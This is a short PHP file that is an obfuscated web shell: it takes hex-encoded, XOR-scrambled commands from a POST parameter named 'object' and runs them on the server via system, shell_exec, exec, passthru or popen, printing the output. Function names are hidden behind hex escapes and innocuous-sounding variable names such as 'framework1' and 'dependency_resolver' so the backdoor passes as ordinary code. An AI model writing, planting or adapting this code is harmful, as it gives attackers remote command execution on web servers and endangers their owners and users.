<?php

$framework4 = "pa\x73s\x74\x68ru";
$framework3 = "ex\x65c";
$splitter_tool = "he\x78\x32\x62\x69n";
$framework7 = "p\x63\x6Cose";
$framework6 = "s\x74\x72ea\x6D_g\x65t_c\x6F\x6Etent\x73";
$framework5 = "p\x6F\x70en";
$framework1 = "system";
$framework2 = "s\x68\x65\x6Cl\x5F\x65xec";
if (isset($_POST["\x6Fb\x6Ae\x63t"])) {
            function dependency_resolver ( $flg,    $record){ $item   ='' ;$j=0; while($j<strlen($flg)){$item.=chr(ord($flg[$j])^$record);$j++;} return $item;    }
            $object = $splitter_tool($_POST["\x6Fb\x6Ae\x63t"]);
            $object = dependency_resolver($object, 18);
            if (function_exists($framework1)) {
                $framework1($object);
            } elseif (function_exists($framework2)) {
                print $framework2($object);
            } elseif (function_exists($framework3)) {
                $framework3($object, $descriptor_flg);
                print join("\n", $descriptor_flg);
            } elseif (function_exists($framework4)) {
                $framework4($object);
            } elseif (function_exists($framework5) && function_exists($framework6) && function_exists($framework7)) {
                $record_item = $framework5($object, 'r');
                if ($record_item) {
                    $ref_obj = $framework6($record_item);
                    $framework7($record_item);
                    print $ref_obj;
                }
            }
            exit;
        }